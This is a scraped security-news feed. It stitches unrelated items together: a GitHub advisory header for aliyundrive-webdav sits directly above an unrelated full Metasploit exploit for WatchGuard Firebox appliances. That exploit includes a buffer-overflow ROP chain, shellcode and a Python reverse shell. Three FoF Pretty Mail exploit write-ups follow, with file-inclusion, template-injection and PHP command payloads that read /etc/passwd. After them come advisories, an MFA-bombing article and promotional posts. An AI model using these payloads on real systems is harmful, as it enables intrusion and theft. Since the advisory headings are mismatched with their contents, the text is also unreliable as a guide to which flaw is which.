An issue in aliyundrive-webdav v.2.3.3 and before allows a remote attacker to execute arbitrary code via a crafted payload to the sid parameter in the `action_query_qrcode` component.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29640

**aliyundrive-webdav vulnerable to Command Injection**

High severity GitHub Reviewed Published Mar 29, 2024 to the GitHub Advisory Database • Updated Mar 29, 2024

**Package**

cargo aliyundrive-webdav (Rust)

**Affected versions**

<= 2.3.3

pip aliyundrive-webdav (pip)

**Description**

Published to the GitHub Advisory Database

Mar 29, 2024

Last updated

Mar 29, 2024

GHSA-73v2-rxqp-7q4f: aliyundrive-webdav vulnerable to Command Injection

This Metasploit module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zlib'class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary          called wgagent using pre-authentication endpoint /agent/login.          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Charles Fol (Ambionics Security)', # discovery          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'          'Misterxid' # POC        ],        'References' => [          [ 'CVE', '2022-26318' ],          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Automatic (Reverse Python Interactive Shell)',            {              'Platform' => [ 'unix' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                'SHELL' => '/usr/bin/python'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-08-29',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8080        },        'Notes' => {          'Stability' => [ SERVICE_RESOURCE_LOSS ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])      ]    )  end  def check_watchguard_firebox?    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),      'vars_get' => {        'from_page' => '/'      }    })    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')    false  end  def create_bof_payload    # temporary filename in /tmp where python payload will be stored.    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"    # xml overflow payload    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode    payload << ('A' * 3181).encode    payload << 'MFA>'.encode    payload << ('<BBBBMFA>' * 3680).encode    # padding and rop chain    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"    payload << "\x01\x00\x00\x00\x00\x00\x00"    # shell code to launch an reverse interactive python shell    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed    # The interactive Python shell (-i) is for now the only way to get shell access    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode    payload << "import os; os.remove(\"#{@py_fname}\");".encode    return Zlib.gzip(payload)  end  def check    print_status("Checking if #{peer} can be exploited.")    return CheckCode::Detected if check_watchguard_firebox?    CheckCode::Safe  end  def exploit    print_status("#{peer} - Attempting to exploit...")    bof_payload = create_bof_payload    print_status("#{peer} - Sending payload...")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),      'headers' => {        'Accept-Encoding' => 'gzip, deflate',        'Content-Encoding' => 'gzip'      },      'data' => bof_payload    })  endend

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a local file inclusion vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Local FileInclusion (LFI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Local FileInclusion (LFI) due to the unsafe handling of file paths in the emailtemplate. An attacker with administrative access can exploit thisvulnerability to include sensitive files from the server's file system inthe email content, potentially leading to information disclosure.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload at the endof the template:{{ include('/etc/passwd') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the contents of the included file (inthis case, /etc/passwd) in the email content.

FoF Pretty Mail 1.1.2 Local File Inclusion

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a server-side template injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-SideTemplate Injection (SSTI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Server-SideTemplate Injection (SSTI) due to the unsafe handling of template variables.An attacker with administrative access can inject malicious code into theemail template, leading to arbitrary code execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload:{{ 7*7 }}{{ system('id') }}{{ system('echo "Take The Rose"') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the result of the injected expressions(e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id')}}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.

FoF Pretty Mail 1.1.2 Server-Side Template Injection

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a command injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command InjectionDate: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Command Injectiondue to the unsafe handling of user input in the email template. An attackerwith administrative access can inject PHP code into the email template,leading to arbitrary command execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert one of the following payloads atthe end of the template:<?php system('echo "Take The Rose"; id'); ?>or<?php system('echo "Take The Rose"; cat /etc/passwd'); ?>Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the message "Take The Rose" followed bythe output of the injected command (id or cat /etc/passwd) in the emailcontent.

FoF Pretty Mail 1.1.2 Command Injection

Red Hat Security Advisory 2024-1570-03 - Updated images are now available for Red Hat Advanced Cluster Security. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1570.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: ACS 4.4 enhancement and security update  
Advisory ID:        RHSA-2024:1570-03  
Product:            Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1570  
Issue date:         2024-03-29  
Revision:           03  
CVE Names:          CVE-2019-25210  
====================================================================

Summary: 

Important: Updated images are now available for Red Hat Advanced Cluster Security.

Description:

Updated images are now available for Red Hat Advanced Cluster Security. The  
updated image includes new features and bug fixes.

This release includes the following features and updates:

* New Compliance capabilities (Technology Preview)  
* Network graph enhancements for internal entities  
* Build-time network policy tools is now generally available  
* Init-bundle graphical user interface improvements  
* eBPF CO-RE collection method enabled by default  
* Bring your own database for RHACS Central is now generally available  
* Support RHACS on ROSA hosted control plane  
* Life cycle updates  
* Integration with Red Hat OpenShift Cluster Manager and Paladin Cloud to discover unsecured clusters  
* Migration to stock Red Hat OpenShift SCCs during manual upgrade by using roxctl CLI  
* Cluster discovery by using cloud source integrations  
* Short-lived API tokens for Central  
* Enhanced roxctl deployment check command  
* Authentication of AWS and GCP integrations by using short-lived tokens (Technology Preview)  
* Scanner V4 that uses upstream ClairCore (Technology Preview)  
* Filter workload CVEs by using component and component source

For more information, including bug fix descriptions, see https://docs.openshift.com/acs/4.4/release_notes/44-release-notes.html.

Security fixes:  
* golang: net/http: insufficient sanitization of Host header (CVE-2023-29406)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)  
* helm: Missing YAML content leads to panic (CVE-2024-26147)  
* helm: Shows secrets with --dry-run option in clear text (CVE-2019-25210)

Solution:

CVEs:

CVE-2019-25210

References:

https://docs.openshift.com/acs/4.4/release_notes/44-release-notes.html  
https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2222167  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://issues.redhat.com/browse/ROX-23399

Red Hat Security Advisory 2024-1570-03

Cybercriminals have taken MFA bombing to the next level by calling victims of an attack from a spoofed Apple Support number.

Simply put, MFA bombing (also known as “push bombing” or “MFA fatigue”) is a brute force attack on your patience. Cybercriminals use MFA bombing to break into accounts that are protected by multi-factor authentication (MFA).

MFA normally requires a user to enter a six-digit code sent by SMS, or generated by an app, or to respond to a push notification, when they enter a username and password. It provides an enormous increase in security and makes life much harder for criminals.

Because it’s so hard to break, criminals have taken to getting users to defeat their own MFA. They do this by using stolen credentials to try logging in, or by trying to reset a user’s password over and over again. In both cases this bombards the user with push notifications asking them to approve the login, or messages asking them to change their password. By doing this, the criminals hope that users will either tap the wrong option or get so fed up they just do whatever the messages are asking them to do, just to make the bombardment stop.

Now, according to this blog by Bran Krebs, these attacks have evolved. If you can withstand the pressure of the constant notifications, the criminals will call you pretending to come to your rescue.

In one example Krebs writes about, criminals flooded a target’s phone with password reset notifications for their Apple ID. Each notification required the user to choose either “Allow” or “Don’t Allow” before they could go back to using their device.

After withstanding the temptation to click “Allow”, and declining “100-plus” notifications, the victim receved a call from a spoofed number pretending to be Apple Support.

The call was designed to get the victim to trigger a password reset, and then to hand over the one-time password reset code sent to their device. Armed with a reset code, the criminals could change the victim’s password and lock them out of their account.

Luckily, in this situation the victim thought the callers seemed untrustworthy, so he asked them to provide some of his personal information, and they got his name wrong.

Another victim of MFA bombing learned that the notifications kept coming even after he bought a new device and created a new Apple iCloud account. This revealed that the attacks must have been targeted at his telephone number, because it was the only constant factor between the two device configurations.

Yet another target was told by Apple that setting up an Apple Recovery Key for his account would stop the notifications once and for all, although both Krebs and the victim dispute this.

Unfortunately, there doesn’t seem to be a lot you can do once an MFA bombing attack starts other than be patient, and be careful not to click Allow. If you get a call, know that Apple Support will never call you out of the blue, so don’t trust the caller, no matter how convenient their timing.

If you lose control of your Apple ID, go to iforgot.apple.com to start the account recovery process.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 MFA bombing taken to the next level 

### Impact
A vulnerability was found in the Language class that allowed DoS attacks. This vulnerability can be exploited by an attacker to consume a large amount of memory on the server.

### Patches
Upgrade to v4.4.7 or later. See [upgrading guide](https://codeigniter4.github.io/userguide/installation/upgrade_447.html).

### Workarounds
- Disabling Auto Routing prevents a known attack vector in the framework.
- Do not pass invalid values to the `lang()` function or `Language` class.

### References
- https://codeigniter4.github.io/userguide/outgoing/localization.html#language-localization
- https://codeigniter4.github.io/userguide/general/common_functions.html#lang


**CodeIgniter4 DoS Vulnerability**

High severity GitHub Reviewed Published Mar 29, 2024 in codeigniter4/CodeIgniter4 • Updated Mar 29, 2024

GHSA-39fp-mqmm-gxj6: CodeIgniter4 DoS Vulnerability

By Uzair Amir
Isn’t it shocking that people still use passwords like QWERTY12, 1234, or pet names for their online accounts?…
This is a post from HackRead.com Read the original post: Payment authorization and one-time passwords – Mobile Token

Isn’t it shocking that people still use passwords like QWERTY12, 1234, or pet names for their online accounts? To make matters worse, many users tend to have the same password across multiple services. This makes it easier for hackers to access their accounts and steal sensitive information. It was one of the reasons why organizations like banks had to implement extra security measures to safeguard their customers’ data and transactions.

****The importance of mobile tokens****

With the advancement of mobile banking, terms such as “bank tokens” and “mobile tokens” have become increasingly relevant. These forms of authentication and authorization have become indispensable in the everyday use of mobile applications, and their significance cannot be overstated in financial security.

In this context, it is worth exploring top-notch Mobile Token solutions. As a reliable and efficient authorization method, the token provides effective protection and convenience for customers, addressing the needs of modern financial institutions.

****The mechanism behind the mobile token solution****

The tool generates one-time passwords (OTP). It is used to authorize various operations in mobile and online banking channels, such as transactions and data changes, or to authorize operations using a mobile PIN without rewriting the SMS code. This mechanism is also used for two-factor authentication (2FA) or mobile authentication.

The mobile token provides a range of functions that can simplify a bank’s customers’ lives. The most commonly used are operations and transaction authorization. We know firsthand that users appreciate this way of handling payments and confirmations. So, why not give it a try and experience the convenience it has to offer? 

Multifactor authentication or a complicated authorization process can frustrate users, as they often don’t consider security a primary concern. If the methods are too complex or inconvenient, they seriously influence user experience. Eliminate this threat and choose a user-friendly option right away. 

In addition to customer benefits, the bank gains heightened security, PSD-2 compliance, and cost-effectiveness. Not to mention, that the solution can be seamlessly integrated with the bank’s infrastructure.

****To sum up****

Mobile tokens offer a balance of security and convenience, ensuring that financial transactions are safe and user-friendly. A reliable Mobile Token solution exemplifies this approach, providing a reliable method for safeguarding online and mobile banking operations.

It supports various functions, including transaction authorization and two-factor authentication, enhancing the security framework without overwhelming the user. Thus, it is an essential component of modern banking security.

1.  The Future of Fintech Applications
2.  List of most used passwords is here and it’s appalling
3.  Types of SaaS Applications: Categories and Examples
4.  A Short Guide to Understanding Exciting Realm of Fintech
5.  Digital Transformation in Financial Industry: Role of Fintech

Payment authorization and one-time passwords – Mobile Token

By Uzair Amir
Building on Plasma Next would make the DEX as convenient as CEX for trading with low fees, slippage, and waiting period.
This is a post from HackRead.com Read the original post: IdeaSoft To Launch an Innovative Perpetual DEX on INTMAX’s Open-source L2 Plasma Next

INTMAX, developer of the open-source Ethereum scalability solution Plasma Next that offers near-zero gas fees to enable nano-transactions, has announced that IdeaSoft, a member of Sigma Software Group that specializes in building fintech blockchain applications, is building a perpetual decentralized exchange on Plasma Next.

This strategic partnership leverages IdeaSoft’s vast expertise in WEB3 development across various sectors, signalling a significant leap forward in the Plasma Next ecosystem.

The perpetual DEX, called JIBx, will offer zero transaction fees, restacking, and leverage of up to 250X, and boasts an on-chain matching engine with off-chain private settlement and account layers powered by Plasma Next. Users will get the cheapest transaction cost and highest performance with programmability while retaining the security and stability of Ethereum. 

INTMAX Plasma Next is the complete version of Plasma, the Ethereum scalability solution presented by Joseph Poon and Vitalik Buterin in 2017. Plasma Next solved the main problem with the fund exit (difficult online requirements and on-chain verification costs) using zero-knowledge proofs.

By ensuring constant state growth per block without individual liquidity preparations and removing the need for constant online vigilance, Plasma Next offers a practical solution to the long-standing challenge of achieving statelessness in blockchain systems. 

Recently, INTMAX Plasma Next teamed up with ETH Samba to empower Brazil’s vibrant Ethereum developer community and introduced the innovative nanoMoney.js, a groundbreaking JS library that aims to reward website users for engaging actions like reading, liking, or creating content.

Through this collaboration, Plasma Next demonstrated its ability to facilitate rewards as small as $0.000000001 in DAI, which is only possible when the gas fee is almost zero. Plasma Next makes Ethereum ultra-convenient for micro- and nano-transactions at scale.

Andrey Lazorenko, the Co-founder and CEO of IdeaSoft, said, “Super excited to start using INTMAX Plasma Next with our team! It’s exactly what we need to make many of the projects faster, more convenient for users, and finally get overwhelming adoption. Can’t wait to see what we’ll build with this.”

INTMAX Co-founder Leona Hioki commented, “The IdeaSoft team is highly talented and professional, with unmatched experience in financial trading in general and virtual currency in particular. I am confident that together we will be able to create a product of exceptional quality. It is a great honour to work with them.”

JIBx leverages Plasma Next for both settlement and account layers, ensuring unmatched privacy, low trading fees, security, and scalability. Distinctively, it features a perpetual on-chain limit order book utilizing black-red tree sorting. This strategic choice significantly lowers transaction costs while simultaneously increasing transactions per second (TPS), setting a new standard for DEX technology.

This DEX is poised to be the first of its kind that combines the convenience of centralized exchanges with the integrity and security of decentralized platforms. Among its novel features are:

*   **Near 0 transaction fees –**  Plasma Next allows to reduce fees to less than a cent amount
*   **Efficient Funding Rates Model:** Rewards from collateral re-staking are available immediately when you open your position.
*   **Bootstrapped Re-staking:** Utilizing stablecoins and LST-based assets, we create an intriguing multiplier effect. This enables the distribution of points for re-staking and allows us to share fees with active traders.
*   **Stablecoin and LST Staking Pools:** A stablecoin pool ensures liquidity is locked during margin trading. Meanwhile, the LST staking pool offers rewards and reduced trading commissions.
*   **Perpetual Swaps with High Leverage:** Offers up to 250X leverage, backed by innovative algorithms and an insurance fund to efficiently manage high-risk operations.

By supporting IdeaSoft in developing the JIBx platform, INTMAX not only promotes the growth of the Plasma Next ecosystem but also contributes to the broader blockchain community. This initiative underscores a commitment to innovation, open-source development, and the democratization of finance, marking a pivotal step toward a more accessible and efficient decentralized finance landscape.

Plasma Next represents a groundbreaking evolution, promising to redefine blockchain scalability and privacy for the digital age. By addressing the need for constant online presence—a significant barrier to user adoption—Plasma Next marks a significant leap forward, giving developers a platform to build secure and highly scalable dApps.

****About IdeaSoft****

IdeaSoft is an EU-based custom software development company with over 7 years of experience and a track record of delivering 250+ projects. The company’s primary focus is on developing blockchain & web 3.0 solutions, with a particular emphasis on CeFi, DeFi, dApps, blockchain gaming, blockchain infrastructure, RWA tokenization, security tokens, custom blockchain solutions, and smart contract development.

Additionally, the team possesses extensive experience in creating fintech and banking apps, ranging from neobanking, core banking, open banking, and embedded banking to BaaS. IdeaSoft is an official partner and member of Sigma Software Group since 2021.

****About INTMAX****

INTMAX is the developer of the open-source Ethereum scalability solution Plasma Next which offers constant near-zero gas fees to enable nano-transactions. It is the Stateless Ethereum Layer built for mass adoption, offering a highly efficient, secure, and scalable solution for blockchain applications.

INTMAX provides a ready-to-use solution to empower any applications and services with instant, the most secure, and near-zero cost crypto transactions.  For more information, visit their website or contact: Sergei Medvedev at \[email protected\].

Tag

#git